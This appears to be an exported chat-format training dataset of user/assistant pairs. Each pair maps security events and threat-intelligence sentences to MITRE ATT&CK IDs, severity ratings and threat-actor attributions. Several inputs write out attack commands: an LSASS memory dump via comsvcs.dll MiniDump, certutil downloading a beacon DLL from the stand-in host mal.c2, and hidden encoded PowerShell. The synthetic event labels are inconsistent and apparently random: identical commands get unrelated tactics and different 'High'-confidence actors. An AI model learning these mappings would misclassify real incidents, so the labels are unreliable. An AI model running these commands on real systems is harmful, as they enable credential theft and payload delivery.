messages
listlengths
2
2
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.20.73.133", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-GG9GWXNOJR)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor executed commands and arguments that could be taken to gather system information related to services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}", "role": "assista...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1113 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.80.210.20", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-UI538PPXMQ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3421 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.131.130.51", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0003\", \"TA0004\"], \"t...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This callback function will call a function named pressedKeyWithKeyCode, which is responsible for logging the keystrokes", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniq...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-YN16MUJN41)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: HAMMERTOSS is controlled via commands that are appended to image files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1001\", \"T1001.002\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-I59GHH51OA)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Privilege Escalation", "role": "user" }, { "conte...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2149 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.157.171.52", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.27.142.71", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-TW2JD1SE8B)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Hig...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2924 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.182.234.228", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techn...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries can modify these values to continually execute arbitrary commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\", \"T1546.001\"]}", "role":...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.50.140.35", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may search in different social media sites depending on what information they seek to gather.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1593\", \"T1593.001\"]}", "role...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: QakBot can Base64 encode system information sent to C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MSBuild.exe may not be necessary within an environment and should be removed if not being used.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1127.001\", \"T1127\"]}", "r...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1582 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.68.68.155", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\", \"TA0001\"], \"techni...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.", "role": "user" }, { "content": "{\"tacti...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2883 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.22.148.230", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0040\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation.", "role": "user" }, { "co...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.135.35.211", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"tech...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"}"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-VOK9UT7B7Q)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution, Exfiltration, Defense Evasion", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.", "role": "user" }, { "content": "{\"tact...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: zwShell has used RDP for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.001\", \"T1021\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-2FGXWLB4JG)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-3AHOW5UZ27)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Privilege Escalation, Initial Access", "role": "user" }...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2265 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly constructed network connections associated with processes performing collection activity, especially those involving abnormal/untrusted hosts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3279 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.143.223.3", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-IPMIL7ESKR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Defense Evasion", "role": "user" }, { "content": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3997 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1898 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.7.25.192", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0040\"], \"techniques\": [\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: KONNI has sent data and files to its C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and Powe...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.27.67.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0003\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom deve...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.175.137.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0002\"], \"tech...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.137.238.95", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Helminth has checked the local administrators group.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069.001\", \"T1069\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-B66AP22B5E)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"seve...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered S...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Gamaredon Group has used HTTP and HTTPS for C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-I1H7NY3K29)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Credential Access, Discovery", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-NNK3X75KJW)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Lateral Movement, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-8JELVOH8Z1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-LORIKNMBFJ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Initial Access, Reconnaissance", "role": "user" }, { "content...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-MJELSWE4CI)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Command and Control, Initial Access", "role": "user" }...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2194 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.3.77.233", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0002\"], \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled rele...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 522 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.181.250.246", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0009\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1765 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-4XC8Z0E4M9)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Users listed in the at.allow are enabled to schedule actions using at, whereas users listed in at.deny file disabled from the utility.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via Multi-hop Proxy or exfiltrat...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: OilRig has used LinkedIn to send spearphishing links.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566.003\", \"T1566\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-4QWZZCOU3V)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Discovery", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2210 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass application control.", "role": "user" }, { "content": "{\"tactics\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.68.194.86", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0010\"], \"techniques\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-YQ1GBPDSVE)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Reconnaissance", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-B1VBP2B3BS)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Command and Control, Defense Evasion", "role": "user"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.155.18.131", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0006\"], \"techniques\": [\"T1570\"]...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.147.166.137", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0008\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-0MGMMS25CM)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.51.116.131", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0006\", \"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-17WX9AOSV2)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Hig...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-0F3DPDN2G7)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Discovery, Defense Evasion", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-12UMZD1NNT)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-89EKYMNOZM)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Critic...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-NNWB377I19)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Command and Control, Execution", "role": "user" }, {...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-3WUJK3BZS5)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Privilege Escalation, Reconnaissance", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-KLENKRZPS6)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Persistence", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-MRG1KR88UA)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Command and Control", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1598 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-11EV8VVKLQ)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Persistence, Exfiltration", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: QUADAGENT gathers the current domain the victim system belongs to.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]